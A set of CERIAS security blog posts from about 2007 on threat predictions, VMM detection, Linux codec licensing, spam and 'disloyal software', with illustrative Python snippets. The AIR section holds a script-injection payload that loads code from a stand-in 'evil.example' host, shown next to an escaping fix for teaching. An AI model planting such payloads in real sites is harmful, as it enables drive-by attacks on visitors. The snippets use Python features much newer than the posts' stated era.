The Center for Education and Research in Information Assurance and Security (CERIAS)


CERIAS Blog


Gazing in the Crystal Ball


Four times in the last month I have been contacted by people asking for my predictions about future cyber security threats and protections.  One of those instances will be when I serve on a panel at the Information Security Decisions Conference in Chicago next week; we’ll be talking about the future of infosec.

Another of those contacts was from the people at Information Security magazine for their upcoming 10th anniversary issue.  I was interviewed back in 2002, and my comments were summarized in a “crystal ball” article.  Some of those predictions were more like trend forecasts, but I think I did pretty well.  Most happened, and a couple may yet come to pass (I didn’t say they would all happen in 5 years!).  I had a conversation with one of the reporters for the Nov 2007 issue, and provided some more observations looking forward.

After answering several of these requests, I thought it might be worthwhile to validate my views.  So, I wrote up a list of things I see happening in security as we go forward.  Then I polled what I thought was a small set of colleagues; through an accident of mail aliases, a larger group of experts got my query.  (The mailer issue may be fodder for a future blog post.)  I got about 20 thoughtful replies from some real experts and deep thinkers in the field.

What was interesting was that, while reading the replies, I found only a few minor differences from what I had already written!  Either that means I have a pretty good view of what’s coming, or else the people I asked are all suffering under the same delusions.

Of course, none of us made predictions as are found in supermarket tabloids, along the lines of “Dick Cheney will hack into computers running unpatched Windows XP at the Vatican in February in an attempt to impress Britney Spears.”  Although we might generate some specific predictions like that, I don’t think our crystal balls have quite the necessary resolution.  Plus, I’m sure the Veep’s plans along those lines are classified, and we might end up in Gitmo for revealing them.  Nonetheless, I’d like to predict that I will win the Powerball Lottery, but will be delayed collecting the payout because Adriana Lima has become so infatuated with me, she has abducted me.  Yes, I’d like to predict that, but I think the Cheney prediction might be more likely….

But seriously, here are some of my predictions/observations of where we’re headed with cyber security.  (I’m not going to name the people who responded to my poll, because when I polled them I said nothing about attributing their views in public; I value my friends’ privacy as much or more than their insights!  However, my thanks again to those who responded.) 

If all of these seem obvious to you, then you are probably working in cyber security or have your own crystal ball.

Threats
Expect attack software to be the dominant threat in the coming few years.  As a trend, we will continue to see fewer overt viruses and worms, and more threats that hijack machines with bots, trojans, and browser subversion.  Threats that self-modify to avoid detection, and threats that attack back against defenders, will make the situation even more challenging.  It will eventually be too difficult to tell whether a system is compromised and to disinfect it; the standard protocol will be to reformat and reinstall at any hint of trouble.

Spam, pop-up ads, and further related advertising abuses will grow worse (as difficult as that is to believe), and will continue to mask more serious threats.  The ties between spam and malware will increase.  Organized crime will become more heavily involved in both because of the money to be made coupled with the low probability of prosecution.

Extortion based on threats to integrity, availability, or exposure of information will become more common as systems are invaded and controlled remotely.  Extortion of government entities may be threatened based on potential attacks against infrastructure controls.  These kinds of losses will infrequently be revealed to the public.

Theft of proprietary information will increase as a lucrative criminal activity.  Particularly targeted will be trade secret formulations and designs, customer lists, and supply chain details.  The insider threat will grow here, too.

Expect attacks against governmental systems, and especially law enforcement systems, as criminals seek to remove or damage information about themselves and their activities.

Protections
Fads will continue and will seem useful to early adopters, but as greater roll-out occurs, deficiencies will be found that will make them less effective—or possibly even worse than what they replace.  Examples include overconfident use of biometrics and over-reliance on virtualization to protect systems.  Mistaken reliance on encryption as a solution will also be a repeated theme.

We will continue to see huge expenditures on R&D to retrofit security onto fundamentally broken technologies rather than on re-engineering systems according to sound security principles.  Governments and many companies will continue to stress the search for “new” ideas without adequately applying older, proven techniques that might be somewhat inconvenient even though effective.

There will be continued development of protection technologies out of proportion to technologies that will enable us to identify and punish the criminals.  It will be a while before the majority of people catch on that passive defense alone is not enough and begin to appropriately capitalize investigation and law enforcement.  We will see more investment in scattered private actions well before we see governments stepping up.

White-listing and integrity management solutions will become widely used by informed security professionals as they become aware of how impossible it is to detect all bad software and behavior (blacklisting).  Meanwhile, because of increasing stealth and sophistication of attacks, many victims will not realize that their traditional IDS/anti-virus solutions based on blacklists have failed to protect them. 

White-listing will also obviate the competition among some vendors to buy vulnerabilities, and sidestep the difficulty of identifying zero-day attacks, because it does not depend on recognizing specific bad items.  However, it may be slow to be adopted because so much has already been invested in traditional blacklist technologies: firewalls, IDS/NIDS/IPS, antivirus, etc.
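To make the contrast with blacklisting concrete, here is a minimal sketch (not any particular vendor’s product) of an integrity-style white-list check: executables are compared against a list of known-good cryptographic hashes, and anything not on the list is flagged.  The directory and the hash entries are hypothetical.

```python
# Minimal white-list (integrity) check: compare files against known-good
# SHA-256 digests recorded earlier (e.g., at install time). Anything not on
# the list is flagged, instead of trying to recognize every possible bad file.
import hashlib
from pathlib import Path

APPROVED_HASHES = {
    "0" * 64,  # placeholder entry; real deployments load these from a signed list
}

def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def audit(directory: str) -> None:
    for item in Path(directory).rglob("*"):
        if item.is_file():
            status = "ok" if sha256_of(item) in APPROVED_HASHES else "NOT ON WHITE-LIST"
            print(f"{status:>17}  {item}")

if __name__ == "__main__":
    audit("/usr/local/bin")  # hypothetical directory to audit
```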

Greater emphasis will be placed on positive identity management, both online and in the physical world.  Coupled with access control, this will provide some solutions but further erode privacy.  Thus, it is uncertain how widely these technologies will be embraced.  TSA and too much of the general public will still believe that showing a picture ID somehow improves security, so the way ahead in authentication/identification is uncertain.

Personnel
We will continue to see more people using sensitive systems, but not enough people trained in cyber protection.  This will continue some current trends such as people with questionable qualifications calling themselves “experts,” and more pressure for certifications and qualifications to demonstrate competence (and more promotion of questionable certifications to meet that need).

Many nations will face difficulties finding appropriately educated and vetted experts who are also capable of getting national-level clearances.  Industry may also find it difficult to find enough trained individuals without criminal records, which will lead to greater reliance on outsourcing.  It will also mean that we will continue to see instances where poorly-informed individuals mistakenly think that single technologies will solve all their problems, with firewalls and encryption being two prime examples.

Personnel for after-the-fact investigations (both law enforcement and civil) will be in high demand and short supply.

Much greater emphasis needs to be placed on educating the end-user population about security and privacy, but this will not receive sufficient support or attention. 

The insider threat will become more pronounced because systems are mostly still being designed and deployed with perimeter defenses.

Milieu
Crime, identity theft, and violations of privacy will increasingly become part of public consciousness.  This will likely result in reduction of trust in on-line services.  This may also negatively impact development of new services and products, but there will still be great adoption of new technologies despite their unknown risk models; VoIP is an example.

Some countries will become known as havens for computer criminals.  International pressure will increase on those countries to become “team players” in catching the criminals.  This will not work well in those countries where the government has financial ties to the criminals or has a political agenda in encouraging them.  Watch for the first international action (financial embargo?) on this issue within the next five years.

We will see greater connectivity, more embedded systems, and less obvious perimeters.  This will require a change in how we think about security (push it into the devices and away from network core, limit functionality), but the changes will be slow in coming.  Advertisers and vendors will resist these changes because some of their revenue models would be negatively impacted.

Compliance rules and laws will drive some significant upgrades and changes, but not all will be appropriate as the technology changes.  Some compliance requirements may actually expose organizations to attack.  Related to compliance, the enforcement of external rights (e.g., copyright using DRM) will lead to greater complexity in systems, more legal wrangling, and increased user dissatisfaction with some IT products.

More will be spent in the US on DRM enforcement and attempts to restrict access to online pictures of naked people than is likely to be spent on cybersecurity research.  More money will be spent by the US government ensuring that people don’t take toothpaste in carry-on luggage on airplanes than will be spent on investigating and prosecuting computer fraud and violation of spam laws.

Government officials will continue to turn to industry for “expert advice”—listening to the same people who have built multinational behemoths by marketing the unsafe products that got us into this mess already.  (It’s the same reason they consult the oil executives on how to solve global warming.)  Not surprisingly, the recommendations will all be for strongly worded statements and encouragement, but not real change in behavior.

We will see growing realization that massive data stores, mirroring, RAID, backups and more mean that data never really goes away.  This will be a boon to some law enforcement activities, a terrible burden for companies in civil lawsuits, and a continuing threat to individual privacy.  It will also present a growing challenge to reconcile different versions of the same data in some meaningful way.  Purposeful pollution of the data stores around the world will be conducted by some individuals to make the collected data so conflicted and ambiguous that it cannot be used.

Overall bottom line: things are going to get worse before they get better, and it may be a while before they do.


Thoughts on Virtualization, Security and Singularity


The “VMM Detection Myths and Realities” paper has been heavily reported and discussed before.  It considers whether a theoretical piece of software could detect if it is running inside a Virtual Machine Monitor (VMM).  An undetectable VMM would be “transparent”.  Many arguments are made against the practicality or the commercial viability of a VMM that could provide performance, stealth and reproducible, consistent timings.  The arguments are interesting and reasonably convincing that it is currently infeasible to absolutely guarantee undetectability. 

However, I note that the authors are arguing from essentially the same position as atheists arguing that there is no God.  They argue that the existence of a fully transparent VMM is unlikely, impractical, or would require an absurd amount of resources, both physical and in software development effort.  This is reasonable because the VMM has to fail only once in preventing detection, there are many ways in which it can fail, and preventing each kind of detection is complex.  However, this is not a hermetic, formal proof that such a VMM is impossible and cannot exist; a new breakthrough technology or an “alien science-fiction”, god-like technology might make it possible.

Then the authors argue that with the spread of virtualization, it will become a moot point for malware to try to detect whether it is running inside a virtual machine.  One might be tempted to remark that this argument cuts both ways: doesn’t it also become a moot point for an operating system or a security tool to try to detect whether it is running inside a malicious VMM?
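As a concrete aside, here is a crude sketch of the kind of check malware (or a defender) can make on Linux today; it only catches a VMM that is not trying to hide, since a transparent VMM would simply withhold these clues.  The vendor strings are a small, illustrative sample.

```python
# Crude VMM-presence heuristics on Linux: look for the CPUID "hypervisor"
# flag as exported in /proc/cpuinfo, and for well-known virtualization vendor
# strings in the DMI tables. A VMM trying to be transparent would withhold
# these, so the absence of clues proves nothing.
from pathlib import Path

VM_HINTS = ("vmware", "virtualbox", "qemu", "kvm", "xen", "innotek", "virtual machine")

def cpuinfo_reports_hypervisor() -> bool:
    try:
        return "hypervisor" in Path("/proc/cpuinfo").read_text()
    except OSError:
        return False

def dmi_reports_vm_vendor() -> bool:
    for entry in ("sys_vendor", "product_name"):
        try:
            value = Path("/sys/class/dmi/id", entry).read_text().strip().lower()
        except OSError:
            continue
        if any(hint in value for hint in VM_HINTS):
            return True
    return False

if __name__ == "__main__":
    if cpuinfo_reports_hypervisor() or dmi_reports_vm_vendor():
        print("Signs of a (non-hiding) VMM present.")
    else:
        print("No obvious signs; this says nothing about a stealthy VMM.")
```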

McAfee’s “secure virtualization”
The security seminar by George Heron answers some of the questions I was asking at last year’s VMworld conference, and elaborates on what I had in mind then.  The idea is to integrate security functions within the virtual machine monitor.  Malware nowadays prevents the installation of security tools and interferes with them as much as possible.  If malware is successfully confined inside a virtual machine, and the security tools are operating from outside that scope, this could make it impossible for an attacker to disable security tools.  I really like that idea. 
 
The security tools could reasonably expect to run directly on the hardware or with an unvirtualized host OS.  Because of this, VMM detection isn’t a moot point for the defender.  However, the presentation did not discuss whether the McAfee security suite would attempt to detect if the VMM itself had been virtualized by an attacker.  Also, would it be possible to detect a “bad” VMM if the McAfee security tools themselves run inside a virtualized environment on top of the “good” VMM?  Perhaps it would need more hooks into the VMM to do this; many hooks, in fact, to attempt to catch all the possible ways in which a malicious VMM can fail to hide itself properly.  What is the cost of all these detection attempts, which must be executed regularly?  Isn’t it prohibitive, therefore making strong malicious VMM detection impractical?  In the end, I believe this may be yet another race whose outcome depends on how much effort each side is willing to put into cloaking and detection.  Practical detection is almost as hard as practical hiding, and the detection cost has to be paid everywhere, on every machine, all the time.


Which Singularity?
Microsoft’s Singularity project attempts to create an OS and execution environment that is secure by design and simpler.  What strikes me is how it resembles the “white list” approach I’ve been talking about.  “Singularity” is about constructing secure systems with statements (“manifests”) in a provable manner.  It states what processes do and what may happen, instead of focusing on what must not happen. 
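To illustrate the “state what may happen” idea, here is a toy sketch; it is not Singularity’s actual manifest language or API, just the declarative pattern: each component declares up front the operations it may perform, and anything it did not declare is refused.

```python
# Toy illustration of manifest-style policy: a component declares what it may
# do, and anything undeclared is refused, rather than enumerating everything
# that must not happen. This is not Microsoft's actual manifest format.
from dataclasses import dataclass, field

@dataclass
class Manifest:
    name: str
    may: set = field(default_factory=set)  # declared operations, e.g. {"read:/var/log"}

class PolicyError(Exception):
    pass

def check(manifest: Manifest, operation: str) -> None:
    if operation not in manifest.may:
        raise PolicyError(f"{manifest.name} never declared '{operation}'")

# A hypothetical log-viewer component and its declared operations.
viewer = Manifest("logviewer", may={"read:/var/log", "draw:window"})

check(viewer, "read:/var/log")          # allowed: it was declared
try:
    check(viewer, "write:/etc/passwd")  # refused: never declared
except PolicyError as err:
    print("refused:", err)
```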

Last year I thought that virtualization and security could provide a revolution;  now I think it’s more of the same “keep building defective systems and defend them vigorously”, just somewhat stronger.  Even though I find the name somewhat arrogant, “Singularity” suggests a future for security that is more attractive and fundamentally stable than yet another arms race.  In the meantime, though, “secure virtualization” should help, and expect lots of marketing about it.

Legit Linux Codecs In the U.S.


As a beginner Linux user, I only recently realized that few people are aware or care that they are breaking U.S. law by using unlicensed codecs.  Even fewer know that the codecs they use are unlicensed, or what to do about it.  Warning dialogs (e.g., in Ubuntu) provide no practical alternative to installing the codecs, and are an unwelcome interruption to workflow.  Those warnings are easily forgotten afterwards, perhaps despite good intentions to correct the situation.  Due to software patents in the U.S., codecs for everything from sound to movies, such as H.264, need to be licensed, regardless of how unpalatable the law may be and of how unfair this situation is to U.S. and Canadian citizens compared to those of other countries.  This impacts open source players such as Totem, Amarok, MPlayer and Rhythmbox.  The CERIAS security seminars, for example, use H.264.  The issue of unlicensed codecs in Linux was brought up by Adrian Kingsley-Hughes, who was heavily criticized for not knowing about, or not mentioning, fluendo.com and other ways of obtaining licensed codecs.

Fluendo Codecs
So, as I like Ubuntu and want to do the legal thing, I went to the Fluendo site and purchased the “mega-bundle” of codecs.  After installing them, I tried to play a CERIAS security seminar.  I was presented with a prompt to install three packs of codecs that require licensing.  Then I realized that the Fluendo set of codecs didn’t include H.264!  Using Fluendo software is only a partial solution.  When contacted, Fluendo said that support for H.264, AAC and WMS would be released “soon”.

Wine
Another suggestion is using Quicktime for Windows under Wine.  I was able to do this, after much work;  it’s far from being as simple as running Synaptic, in part due to Apple’s web site being uncooperative and the latest version of Quicktime, 7.2, not working under Wine.  However, when I got it to work with an earlier version of Quicktime, it worked only for a short while.  Now it just displays “Error -50: an unknown error occurred” when I attempt to play a CERIAS security seminar. 

VideoLAN Player vs MPEG LA
The VideoLAN FAQ explains why VideoLAN doesn’t license the codecs, and suggests contacting MPEG LA.  I did just that, and was told that they were unwilling to let me pay for a personal use license.  Instead, I should “choose a player from a licensed supplier (or insist that the supplier you use become licensed by paying applicable royalties)”.  I wish that an “angel” (a charity?) could intercede and obtain licenses for codecs in their name, perhaps over the objections of the developers, but that’s unlikely to happen.

What to do
Essentially, free software users are the ball in a game of ping-pong between free software authors and licensors.  Many users are oblivious to this no man’s land they somehow live in,  but people concerned about legitimacy can easily be put off by it.  Businesses in particular will be concerned about liabilities.  I conclude that Adrian was right in flagging the Linux codec situation.  It is a handicap for computer users in the U.S. compared to countries where licensing codecs isn’t an issue.

One solution would be to give up Ubuntu (for example) and get a Linux distribution that bundles licensed codecs, such as Linspire (based on Ubuntu), despite the heavily criticized deal it made with Microsoft.  This isn’t about being anti-Microsoft, but about divided loyalties.  Free software, for me, isn’t about getting software for free, even though that’s convenient.  It’s about appreciating the greater assurances that free software provides with regard to divided loyalties and the likelihood of software that is disloyal by design.  Linspire may now, or in the future, have other interests in mind besides those of its users.  That the deal is part of a vague but threatening patent attack on Linux by Microsoft also makes Linspire unappealing.  Linspire is cheap, so cost isn’t an issue; after all, getting the incomplete set of codecs from Fluendo ($40) cost me almost as much as getting the full version of Linspire ($49) would have.  Regardless, Linspire may be an acceptable compromise for many businesses.  Another advantage of Linspire is that it bundles a licensed DVD player as well (note that the DMCA and DVD CCA license compliance are separate issues from licensing codecs such as H.264).

Another possibility is to keep around an old Mac or use lab computers until Fluendo releases the missing codecs.  Even if CERIAS were to switch to Theora just to please me, the problem would surface again later.  So, there are options, but they aren’t optimal.

Hypocritical Security Conference Organizers


Every once in a while, I receive spam for security conferences I’ve never heard of, much less attended.  Typically the organizers of these conferences are faculty members, professors, or government agency employees who should know better than to hire companies to spam for them.  I suppose that hiring a third party provides plausible deniability.  It’s hypocritical.  To be fair, I once received an apology for a spamming, which demonstrated that those involved understood integrity.

It’s true that it’s only a minor annoyance.  But, if you can’t trust someone for small things, should you trust them for important ones?

Disloyal Software


Disloyal software surrounds us.  This is software running on devices or computers you own and that serves interests other than yours.  Examples are DVD firmware that insists on making you watch the silly FBI warning or prevents you from skipping “splashes” or previews, or popup and popunder advertisement web browser windows.  When people discuss malware or categories of software, there is usually little consideration for disloyal software (I found this interesting discussion of Trusted Computing).  Some of it is perfectly legal; some protects legal rights.  At the other extreme, rootkits can subvert entire computers against their owners.  The question is, when can you trust possibly disloyal software, and when does it become malware, such as the Sony CD copy prevention rootkit?

Who’s in Control
Loyalty is a question of perspective: ownership versus control.  An employer providing laptops and computers to employees doesn’t want them to install things that could be liabilities or compromise the computer.  The employee is then using software that is restrictive, but justifiably so.  From the perspective of someone privately owning a computer, a lesser likelihood of disloyalty is an advantage of free software (as in the FSF free software definition).  The developers won’t benefit from implementing restrictions or developing software that does things that go counter to the interests of the user.  If one does, someone somewhere will likely remove that restriction for the benefit of all.  Of course, this doesn’t address the possibility of cleverly hidden capabilities (such as backdoors) or compromised source code repositories.

This leads to questions of control over many other devices, such as game consoles and media players like the iPod.  Why does my iPod, using Apple-provided software, not allow me to copy music files to another computer?  It doesn’t matter which computer as long as I’m not violating copyrights; possibly it’s the same computer that ripped the CDs, because the hard drive died or was upgraded, or it’s the new computer I just bought.  By using the iPod as a storage device instead of a music player, such copies can be made with Apple software, but music files in the “play” section can’t be copied out.  This restriction is utterly silly, as it accomplishes nothing but annoying owners, and I’m glad that Ubuntu Linux allows direct access to the music files.
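For what it’s worth, the “storage device” route can be scripted.  The sketch below assumes the iPod is mounted as a disk at a hypothetical mount point and simply copies out the audio files that the player keeps under the hidden iPod_Control/Music folders (with deliberately meaningless names); recovering the real titles would additionally require reading the audio tags or the iTunes database.

```python
# Copy music off an iPod mounted as a plain storage device. The player keeps
# tracks under hidden iPod_Control/Music/F## folders with obfuscated names,
# so this just copies every audio file it finds. MOUNT_POINT is hypothetical.
import shutil
from pathlib import Path

MOUNT_POINT = Path("/media/ipod")          # hypothetical mount point
DESTINATION = Path.home() / "ipod_backup"  # where the copies go
AUDIO_SUFFIXES = {".mp3", ".m4a", ".aac", ".wav"}

def backup_ipod() -> None:
    DESTINATION.mkdir(parents=True, exist_ok=True)
    music_root = MOUNT_POINT / "iPod_Control" / "Music"
    for track in music_root.rglob("*"):
        if track.suffix.lower() in AUDIO_SUFFIXES:
            shutil.copy2(track, DESTINATION / track.name)
            print("copied", track.name)

if __name__ == "__main__":
    backup_ipod()
```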

DMCA
Some firmware implements copyright protection measures, and modifying it to remove those protections is made illegal by the DMCA.  As modifying consoles (“modding”) is often done for that purpose, the act of “modding” has become suspicious in itself.  Someone modding a DVD player simply to be able to bypass annoying splash screens, without affecting copy protection mechanisms, would have a hard time defending herself.  This has a chilling effect on the recycling of perfectly good hardware with better software.  For example, I think Microsoft would still be selling large quantities of the original Xbox if the compiled XBMC media player software weren’t also illegal for most people, due to licensing issues with the Microsoft compiler.  The DMCA helps law enforcement and copyright holders, but it has negative effects as well (see Wikipedia).  Disloyal devices are distasteful, and the current law heavily favors copyright owners.  Of course, it’s not clear-cut, especially for devices that have responsibilities towards multiple entities, such as cell phones.  I recommend watching Ron Buskey’s security seminar about cell phones.

Web Me Up
If you think you’re using only free software, you’re wrong every time you use the web and allow scripting.  Potentially the ultimate disloyal software is the code web sites push to your browser.  Active content (JavaScript, Flash, etc.) on web pages can glue you in place and restrict what you can do and how, or deploy adversarial behaviors (e.g., pop-unders or browser attacks).  Every time you visit a web page nowadays, you download and run software that is not free:

* It is often impractical to access the content of the page, or even basic form functionality, without running the software, so you do not have the freedom to run or not run it as a practical choice (in theory you do have a choice, but the penalties for choosing the alternative can be significant).

* It is difficult to study, given how some code can load other active content from other sites in a chain-like fashion, creating a large spaghetti that can be changed at any time.

* There is no point in redistributing copies, as the copies running from the web sites you need to use won’t change.

* Releasing your “improvements” to the public would almost certainly violate copyrights.  Even if you made useful improvements, the web site owners could change how their site works regularly, thus foiling your efforts.

Most of the above is true even if the scripts you are made to run in a browser are free software from the point of view of the web developers;  the delivery method taints them.

Give me some AIR
The Adobe Integrated Runtime (“AIR”) is interesting because it has the potential to free web technologies such as HTML, Flash and JavaScript, by allowing them to be used in a free, open source way.  CERIAS webmaster Ed Finkler developed the “Spaz” application with it, and licensed it under the New BSD license.  I say “potentially” only because AIR can be used to dynamically load software as well, with all the problems of web scripting.  It’s a question of control and trust.  I can’t trust possibly malicious code that I am forced to run on my machine to access a web page I happen to visit.  However, I may trust static code that is free software not to be disloyal by design.  If it is disloyal, it is possible to fix it and redistribute the improved code.  AIR could deliver that, as Ed demonstrated.

The problem with AIR is that I will have to trust a web developer with the security of my desktop.  AIR has two sandboxes, the Classic Sandbox that is like a web browser, and the Application Sandbox, which is compared to server-side applications except they run locally (see the AIR security FAQ).  The Application Sandbox allows local file operations that are typically forbidden to web browsers, but without some of the more dangerous web browser functionality.  Whereas the technological security model makes sense as a foundation, its actual security is entirely up to whoever makes the code that runs in the Application Sandbox.  People who have no qualms about pushing code to my browser and forcing me to turn on scripting, thus making me vulnerable to attacks from sites I will visit subsequently, to malicious ads, or to code injected into their site, can’t be trusted to care if my desktop is compromised through their code, or to be competent to prevent it.

Even the security FAQ for AIR downplays significant risks.  For example, it says “The damage potential from an injection attack in a given website is directly proportional to the value of the website itself. As such, a simple website such as an unauthenticated chat or crossword site does not have to worry much about injection attacks as much as any damage would be annoying at most.”  This completely ignores scripting-based attacks against the browsers themselves, such as those performed by the well-known malware kits MPack and IcePack.  In addition, there will probably be both implementation and design vulnerabilities found in AIR itself.
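As a generic illustration of why that reasoning is wrong (sketched in Python for consistency with the other examples; the attacker input and URL are made up): whatever a site echoes unescaped is executed by every visitor’s browser, so the damage is to the visitors, regardless of how little the site itself is “worth.”

```python
# Why injection matters even on a "low-value" site: whatever the site echoes
# back unescaped runs in every visitor's browser. The attacker input and the
# exploit URL below are made up for illustration.
import html

attacker_message = '<script src="http://evil.example/exploit.js"></script>'

# Naive page assembly: the attacker's markup ships to every visitor as code.
unsafe_page = "<div class='chat'>" + attacker_message + "</div>"

# Escaped assembly: the same input is rendered as inert text instead.
safe_page = "<div class='chat'>" + html.escape(attacker_message) + "</div>"

print(unsafe_page)  # a browser would fetch and run exploit.js
print(safe_page)    # a browser shows the markup as harmless text
```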

Either way, AIR is a development to watch.

P.S. (10/16): What if AIR attracts the kind of people that are responsible for flooding the National Vulnerability Database with PHP server application vulnerabilities?  Server applications are notoriously difficult to write securely.  Code that they would write for the application sandbox could be just as buggy, except that instead of a few compromised servers, there could be a large quantity of compromised personal computers…